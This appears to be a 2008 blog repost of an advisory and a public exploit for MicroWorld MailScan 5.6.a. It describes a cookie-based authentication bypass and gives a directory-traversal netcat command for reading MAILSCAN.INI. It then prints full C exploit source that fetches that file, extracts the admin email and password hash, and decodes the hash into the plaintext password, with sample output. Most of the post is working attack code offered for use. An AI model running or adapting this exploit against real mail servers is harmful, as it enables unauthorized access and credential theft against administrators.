illmob.org

Microworld Mailscan 5.6.a Password Reveal

September 12th, 2008 by Dev Team in Password Info, windows

From MicroWorld’s website: “MailScan 5.6 is the world’s most
advanced Real-Time AntiVirus and AntiSpam solution for Mail Servers.
The software safeguards organizations against Virus, Worm, Trojan and
many other malware breeds with futuristic and proactive technologies.
Employing an array of intelligent filters, MailScan offers powerful
protection against Spam and Phishing mails along with comprehensive
Content Security.”

http://www.microworld.de
http://www.mwti.net


— >> Authentication bypass <<

After a login attempt with an invalid username and password, the application
is setting a cookie at the webclient with the following content:

Set-Cookie: User=admin; path=/
Set-Cookie: login=true; path=/
Set-Cookie: IsAdmin=false; path=/
Set-Cookie: IP=; path=/

Providing valid username and password will give a cookie with the
following content:

Set-Cookie: User=admin; path=/
Set-Cookie: login=true; path=/
Set-Cookie: IsAdmin=true; path=/
Set-Cookie: IP=; path=/

It is sufficient to set the cookie as shown above to get authenticated on the
admin interface. The user “admin” is a default account, with a password set during
installation.

*BUT* requesting a resource on the webserver *without* supplying a cookie will
also grant access to the requested resource. The attacker just needs to know
the path to the resource.

— >> Directory Traversal <<

It is possible to access files on the system outside of the webroot
directory with privileges of the LocalSystem account:

echo -e "GET /../../../../PROGRA~1/MailScan/MAILSCAN.INI HTTP/1.0\r\n\r\n" | nc

MAILSCAN.INI holds the user/pass in an encrypted form

an exploit tool was made to quicken the decode of the inifile

/*
----------------------------------------------------------------------------------------------

_____ ____
/ ___/___ _____/ __ \___ _ __
\__ \/ _ \/ ___/ / / / _ \ | / /
___/ / __/ /__/ /_/ / __/ |/ /
/____/\___/\___/_____/\___/|___/
[2008] SecurityDevelopment.net

Author: SlaYeR
Date: 25. Aug. 2008
Email: [email protected]
Website: www.securitydevelopment.net
IRC: dragon.overfl0w.org #securitydevelopment.net

----------------------------------------------------------------------------------------------

Exploit based on the advisory from Oliver Karow @
http://securityvulns.com/Udocument375.html

- MailScan for Mail Servers

* Version: 5.6.a with espatch1
* Win32 Platform

Other Mailscan Products, Versions, also, if available
for other platforms, were not tested.

I used the Directory Traversal methode to access the ini file of mailscan
application to gain some importend data.
After some research i found out that the password algorithm was extreamly
weak. So i decided to code a exploit for it.

15. Aug. 2008 - Advisory release
20. Aug. 2008 - SlaYeR founds out about the advisory
21. Aug. 2008 - Found out about the ini file
22. Aug. 2008 - Found out about the weak algorithm and coded a sploit for it.
25. Aug. 2008 - Private version done.
04. Sep. 2008 - Hotfix released by Microworld.
09. Sep. 2008 - Public release

Some special greets to:
Dams - He helped me with some stupid errors inside the decode_hash function
JGS - He helped me with the spliting hash part
Mikke8 - He didn't helped me but i like hem;)

Team Ph0enix - Cuz they Own

----------------------------------------------------------------------------------------------

Example:

_____ ____
/ ___/___ _____/ __ \___ _ __
\__ \/ _ \/ ___/ / / / _ \ | / /
___/ / __/ /__/ /_/ / __/ |/ /
/____/\___/\___/_____/\___/|___/
[2008] SecurityDevelopment.net

- Microworld Mailscan 5.6.a password reveal exploit -
Coded by: SlaYeR

[!] Targeting 192.168.1.111:10443
[!] Building magic string!
[!] Connected to host!
[!] Building request!
[!] Opening target!
[+] SERVER: MailScan 5.6a
[+] ADMIN: [email protected]
[+] HASH: GJBIAHALBCHIBJGJGGAEBMAFBIGGAGGKAIBJHLBMAEBJDHAPBH
[+] PASS: "sl@y3r"-owns-m!cr0word|\
[+] Done!

----------------------------------------------------------------------------------------------

*/

#include
#include
#include

#pragma comment(lib, "wininet")
#pragma comment(lib,"ws2_32")

char *SECDEV_ASCII=
" _____ ____ \n"
" / ___/___ _____/ __ \\___ _ __\n"
" \\__ \\/ _ \\/ ___/ / / / _ \\ | / /\n"
" ___/ / __/ /__/ /_/ / __/ |/ / \n"
" /____/\\___/\\___/_____/\\___/|___/ \n"
" [2008] SecurityDevelopment.net\r\n"
"\r\n"
" - Microworld Mailscan 5.6.a password reveal exploit -\r\n"
" Coded by: SlaYeR\r\n"
" \r\n\r\n";

int decode_hash(char * string);
int Count;
int exploit(char *url,char *port);

int main(int argc, char *argv[])
{
char *url = argv[1];
char *port = argv[2];
printf(SECDEV_ASCII);

if( argc <= 2 ) { printf(" Usage: %s \n",argv[0]);
return 0;
}
else
{
exploit(url,port);
}
return 0;
}

int exploit(char *url,char *port)
{
printf("[!] Targeting %s:%s\n",url,port);

HINTERNET httpopen, openurl;
char buffer2[1024];
DWORD read;
char *check;
char *string1 = "http://";
char *string2 = "/../../../../PROGRA~1/MailScan/MAILSCAN.INI";
char bigbuffer[1025];
char buffer3[1025];
char buffer4[1025];
char buffer5[1025];
char buffer6[1025];

if(httpopen = InternetOpen(NULL, INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0))
{
printf("[!] Building request!\n");
memset(bigbuffer,0,1025);
memcpy(bigbuffer,string1,strlen(string1));
memcpy(bigbuffer+strlen(bigbuffer),url,strlen(url));
memcpy(bigbuffer+strlen(bigbuffer),":",strlen(":"));
memcpy(bigbuffer+strlen(bigbuffer),port,strlen(port));
memcpy(bigbuffer+strlen(bigbuffer),string2,strlen(string2));
}
else
{
printf("[-] Error building request!\n");
InternetCloseHandle(httpopen);
CloseHandle(buffer2);
return 0;
}

printf("[!] Trying to connect @ %s:%s\n",url,port);
if(openurl = InternetOpenUrl(httpopen, bigbuffer, NULL, NULL,
INTERNET_FLAG_RELOAD | INTERNET_FLAG_NO_CACHE_WRITE, NULL))
{
printf("[!] Connected to host!\n");
}
else
{
printf("[-] Error while connecting! \n");
InternetCloseHandle(httpopen);
InternetCloseHandle(openurl);
CloseHandle(buffer2);
return 0;
}

if(InternetReadFile(openurl, buffer2, sizeof(buffer2), &read))
{

if(check = strstr(buffer2, "[General]"))
{

check = strstr(buffer2, "UserPassword=");
sscanf(check, "UserPassword=%s ", buffer3);

check = strstr(buffer2, "AdminEmailId=");
sscanf(check, "AdminEmailId=%s ", buffer4);

check = strstr(buffer2, "ProductName=");
sscanf(check, "ProductName=%s ", buffer5);

check = strstr(buffer2, "Version=");
sscanf(check, "Version=%s ", buffer6);
}

if( check==NULL )
{
printf("[-] Server not vuln :(\n");

}
else
{
printf("[+] SERVER: %s %s\n",buffer5,buffer6);
printf("[+] ADMIN: %s\n",buffer4);
printf("[+] HASH: %s\n",buffer3);
printf("[+] PASS: ");

char bufferfiller[sizeof(buffer3)];
char temp[1025];

memset(bufferfiller,0,sizeof(buffer3));

for (int i=0;i < strlen(buffer3); i++) { Count++; sprintf(temp,"%c",buffer3[i]); memcpy(bufferfiller+strlen(bufferfiller),temp,strlen(temp)); if(Count == 2) { char buf[255]; memset(buf,0,sizeof(255)); sprintf(buf,"%s",bufferfiller); decode_hash(buf); memset(bufferfiller,0,1025); Count = 0; } } printf("\n[+] Done!\n"); } } else { printf("[-] Server not vuln :(\n"); } InternetCloseHandle(httpopen); InternetCloseHandle(openurl); CloseHandle(buffer2); return 0; } int decode_hash(char * string) { // Yes it token me allot of work to wrote this down... (only default charset) // if you want more just do it by yourself if( strcmp( string, "DA" ) == 0 ){printf("{");} if( strcmp( string, "DG" ) == 0 ){printf("}");} if( strcmp( string, "BH" ) == 0 ){printf("|");} if( strcmp( string, "HB" ) == 0 ){printf(":");} if( strcmp( string, "GJ" ) == 0 ){printf("\"");} if( strcmp( string, "HH" ) == 0 ){printf("<");} if( strcmp( string, "HF" ) == 0 ){printf(">");} if( strcmp( string, "HE"
) == 0 ){printf("?");}
if( strcmp( string, "BA" ) == 0 ){printf("[");} if( strcmp( string, "BG"
) == 0 ){printf("]");}
if( strcmp( string, "BH" ) == 0 ){printf("\\");} if( strcmp( string, "HA"
) == 0 ){printf(";");}
if( strcmp( string, "GM" ) == 0 ){printf("'");} if( strcmp( string, "GH"
) == 0 ){printf(",");}
if( strcmp( string, "GF" ) == 0 ){printf(".");} if( strcmp( string, "GE"
) == 0 ){printf("/");}
if( strcmp( string, "DF" ) == 0 ){printf("~");} if( strcmp( string, "GK"
) == 0 ){printf("!");}
if( strcmp( string, "AL" ) == 0 ){printf("@");} if( strcmp( string, "GI"
) == 0 ){printf("#");}
if( strcmp( string, "GP" ) == 0 ){printf("$");} if( strcmp( string, "GO"
) == 0 ){printf("%");}
if( strcmp( string, "BF" ) == 0 ){printf("^");} if( strcmp( string, "GN"
) == 0 ){printf("&");}
if( strcmp( string, "GB" ) == 0 ){printf("*");} if( strcmp( string, "GD"
) == 0 ){printf("(");}
if( strcmp( string, "BE" ) == 0 ){printf("_");} if( strcmp( string, "GA"
) == 0 ){printf("+");}
if( strcmp( string, "GG" ) == 0 ){printf("-");} if( strcmp( string, "HG"
) == 0 ){printf("=");}
if( strcmp( string, "AK" ) == 0 ){printf("a");} if( strcmp( string, "AJ"
) == 0 ){printf("b");}
if( strcmp( string, "AI" ) == 0 ){printf("c");} if( strcmp( string, "AP"
) == 0 ){printf("d");}
if( strcmp( string, "AO" ) == 0 ){printf("e");} if( strcmp( string, "AN"
) == 0 ){printf("f");}
if( strcmp( string, "AM" ) == 0 ){printf("g");} if( strcmp( string, "AD"
) == 0 ){printf("h");}
if( strcmp( string, "AC" ) == 0 ){printf("i");} if( strcmp( string, "AB"
) == 0 ){printf("j");}
if( strcmp( string, "AA" ) == 0 ){printf("k");} if( strcmp( string, "AH"
) == 0 ){printf("l");}
if( strcmp( string, "AG" ) == 0 ){printf("m");} if( strcmp( string, "AF"
) == 0 ){printf("n");}
if( strcmp( string, "AE" ) == 0 ){printf("o");} if( strcmp( string, "BL"
) == 0 ){printf("p");}
if( strcmp( string, "BK" ) == 0 ){printf("q");} if( strcmp( string, "BJ"
) == 0 ){printf("r");}
if( strcmp( string, "BI" ) == 0 ){printf("s");} if( strcmp( string, "BP"
) == 0 ){printf("t");}
if( strcmp( string, "BO" ) == 0 ){printf("u");} if( strcmp( string, "BN"
) == 0 ){printf("v");}
if( strcmp( string, "BM" ) == 0 ){printf("w");} if( strcmp( string, "BD"
) == 0 ){printf("x");}
if( strcmp( string, "BC" ) == 0 ){printf("y");} if( strcmp( string, "BB"
) == 0 ){printf("z");}
if( strcmp( string, "HK" ) == 0 ){printf("1");} if( strcmp( string, "HJ"
) == 0 ){printf("2");}
if( strcmp( string, "HI" ) == 0 ){printf("3");} if( strcmp( string, "HP"
) == 0 ){printf("4");}
if( strcmp( string, "HO" ) == 0 ){printf("5");} if( strcmp( string, "HN"
) == 0 ){printf("6");}
if( strcmp( string, "HM" ) == 0 ){printf("7");} if( strcmp( string, "HD"
) == 0 ){printf("8");}
if( strcmp( string, "HC" ) == 0 ){printf("9");} if( strcmp( string, "HL"
) == 0 ){printf("0");}
if( strcmp( string, "GC" ) == 0 ){printf(")");} if( strcmp( string, "GL"
) == 0 ){printf(" ");}

return 0;
}

// milw0rm.com [2008-09-09]

Leave a reply